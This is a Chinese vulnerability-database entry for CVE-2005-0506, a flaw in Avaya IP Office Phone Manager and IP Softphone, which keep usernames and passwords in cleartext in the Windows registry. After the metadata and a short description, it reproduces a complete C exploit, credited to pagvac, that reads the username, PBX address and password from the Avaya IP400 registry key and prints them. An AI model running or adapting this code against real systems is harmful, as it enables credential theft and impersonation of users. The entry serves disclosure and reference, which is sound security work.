Avaya 敏感信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108483 漏洞类型 未知
发布时间 2005-02-24 更新时间 2005-03-14
CVE编号 CVE-2005-0506 CNNVD-ID CNNVD-200503-108
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/839
https://www.securityfocus.com/bid/90226
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200503-108
|漏洞详情
AvayaIPOfficePhoneManager及IPSoftphone等其他产品将明文敏感数据存放在注册表键中,本地及可能的远程用户可以通过Avaya\IP400\Generic等键窃取用户名和密码,并假冒其他用户。
|漏洞EXP
#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
               Filename:               exploit.c
               Title:          Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit v0.01
               Author:         pagvac (Adrian Pastor)
               Date:                   24th Feb, 2005
               Other info:             tested on version 2.013. Compile as a Win32 console application project in Visual C++
*/

BOOL QueryVal(char lszVal2Query[255], char lszValData[255])
{
    char lszResult[255];
    HKEY hKey;
    LONG returnStatus;
    DWORD dwType=REG_SZ;
    DWORD dwSize=255;
    returnStatus = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey);

        if (returnStatus == ERROR_SUCCESS)
    {
                returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&lszResult, &dwSize);
         if (returnStatus == ERROR_SUCCESS)
         {
                          strcpy(lszValData, lszResult);
         }
                 RegCloseKey(hKey);
                 return TRUE;
    }
        else
        {
                RegCloseKey(hKey);
                return FALSE;
    }
}

void main()
{
       char valData[255];

       printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit\n");
       printf("By pagvac (Adrian Pastor)\n");
       printf("Tested on version 2.013\n\n");

       // Print username
       printf("Username:\t");
       if(!QueryVal("UserName", valData))
               printf("Error! No permissions to read key value?\n");
       else
               printf("%s\n", valData);

       // Print IP address
       printf("PBX IP Address:\t");
       if(!QueryVal("PBXAddress", valData))
               printf("Error! No permissions to read key value?\n");
       else
               printf("%s\n", valData);

       // Print password
       printf("Password:\t");
       if(!QueryVal("Password", valData))
               printf("Error! No permissions to read key value?\n");
       else
       {

               if(strcmp(valData, "")==0)
                       printf("[blank password]\n\n");
               else
               {
                       printf("%s\n", valData);
                       printf("Password obsfucated?\n\n");
               }
       }

}

// milw0rm.com [2005-02-24]
|受影响的产品
Avaya IP Softphone 0
|参考资料

来源:support.avaya.com
链接:http://support.avaya.com/elmodocs2/security/ASA-2005-041_Sensitive_Info_Leak.pdf
来源:BUGTRAQ
名称:20050222Re:AvayaIPOfficePhoneManager-SensitiveInformationCleartextVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110910486128709&w=2
来源:BUGTRAQ
名称:20050222AvayaIPOfficePhoneManager-SensitiveInformationCleartext
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110909733831694&w=2